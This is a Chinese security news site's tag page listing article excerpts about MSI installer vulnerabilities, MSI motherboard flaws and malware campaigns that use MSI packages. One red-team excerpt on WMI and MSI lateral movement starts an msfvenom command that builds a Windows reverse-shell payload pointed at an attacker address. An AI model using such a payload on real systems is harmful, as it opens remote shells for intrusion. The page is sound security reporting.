msi - 第 3 | CN-SEC 中文网

安全漏洞

CVE-2024-38014：Windows 安装程序特权提升漏洞

MSI 分析器这个适用于 Linux 的 Python 脚本可以分析 Microsoft Windows *.msi 安装程序文件并指出潜在的漏洞。它由 SEC Consult Vulnerabili...

09月17日53 views评论

阅读全文

安全文章

MSI 文件漏洞的探索

我们经常遇到 MSI 文件。开发者使用它们来提供和打包自己的程序。此格式比标准 EXE 格式更方便，原因如下：能够恢复、安装某些组件数据存储在结构化的表中，可以通过 API 轻松访问通过 SCCM、W...

09月02日50 views评论

阅读全文

安全新闻

CVE-2024-36877 微星MSI 主板存在严重漏洞

MSI 是一家领先的计算机硬件制造商，该公司最近披露了一个严重漏洞，编号为CVE-2024-36877，该漏洞影响了其多种主板。该漏洞位于系统管理模式 (SMM) 处理程序中，可能允许攻击者在受影响的...

08月15日1,619 views评论

阅读全文

安全新闻

成熟后门再度投递，银狐变种利用MSI实行远控

近期，火绒威胁情报中心监测到一款伪装成MSI安装包的恶意木马正在传播，火绒安全工程师第一时间提取样本进行分析。分析中发现样本在双击执行后会启动数个cmd进程执行释放的木马，该木马不断从远端服务器上下载...

07月29日33 views评论

阅读全文

安全文章

Windows Installer 的 Custom Actions 攻击面分析

Windows Installer，利用自定义操作一年多以前，我发表了我的关于Windows Installer服务的研究。文章详细解释了MSI修复过程如何在提升的上下文中执行，但由于缺乏模拟可能导致...

07月29日30 views评论

阅读全文

安全新闻

Windows 系统中的严重漏洞：攻击者如何完全控制您的 PC

Windows系统上广泛使用的软件MSI Center被发现存在严重安全漏洞。该漏洞分类为CVE-2024-37726，CVSS 评分为 7.8（高）。允许低权限的攻击者完全控制系统。权限提升是指在没...

07月15日15 views评论

阅读全文

安全新闻

横扫全球:Grandoreiro银行木马活动

更多全球网络安全资讯尽在邑安全前言近期关注的一些攻击活动中，刷到了有关Grandoreiro银行木马恶意软件活动，此类恶意软件活动主要针对巴西、墨西哥、西班牙和秘鲁国家等，自 2017 年以来，一直是...

07月08日11 views评论

阅读全文

安全文章

新版本 Redline 使用 Lua 字节码逃避检测

近日，研究人员观察到 Redline Stealer 木马的新变种，开始利用 Lua 字节码逃避检测。遥测分布根据遥测数据，Redline Stealer 木马已经日渐流行，覆盖北美洲、南...

07月04日17 views评论

阅读全文

安全新闻

黑客利用恶意 VPN 安装程序攻击我国用户

近期攻击我国用户的行动有点多啊！中文用户成为了一个新的威胁活动团伙Void Arachne的目标。该团伙利用针对VPN的恶意Windows Installer（MSI）文件，来传播一种名为Winos ...

06月20日39 views评论

阅读全文

安全新闻

新的 SSLoad 恶意软件与劫持整个网络域的工具相结合

FROZEN#SHADOW 被发现采用了一种新的攻击活动，该活动利用 SSLoad 恶意软件进行操作，并利用 Cobalt Strike Implants 来控制和接管整个网络。此外，威胁分子还使用S...

05月29日106 views评论

阅读全文

安全新闻

黑客利用 Windows SmartScreen 漏洞投放 DarkGate 恶意软件

关键词恶意软件DarkGate 恶意软件操作发起的新一波攻击，利用现已修复的 Windows Defender SmartScreen 漏洞来绕过安全检查，并自动安装虚假软件安装程序。SmartScr...

04月22日18 views评论

阅读全文

安全文章

红队战术 - WMI + MSI 横向移动

执行在 MSI（Microsoft 安装程序包）中生成恶意负载：攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...

04月19日10 views评论

阅读全文

CVE-2024-38014：Windows 安装程序特权提升漏洞

MSI 文件漏洞的探索

CVE-2024-36877 微星MSI 主板存在严重漏洞

成熟后门再度投递，银狐变种利用MSI实行远控

Windows Installer 的 Custom Actions 攻击面分析

Windows 系统中的严重漏洞：攻击者如何完全控制您的 PC

横扫全球:Grandoreiro银行木马活动

新版本 Redline 使用 Lua 字节码逃避检测

黑客利用恶意 VPN 安装程序攻击我国用户

新的 SSLoad 恶意软件与劫持整个网络域的工具相结合

黑客利用 Windows SmartScreen 漏洞投放 DarkGate 恶意软件

红队战术 - WMI + MSI 横向移动

在线咨询

微信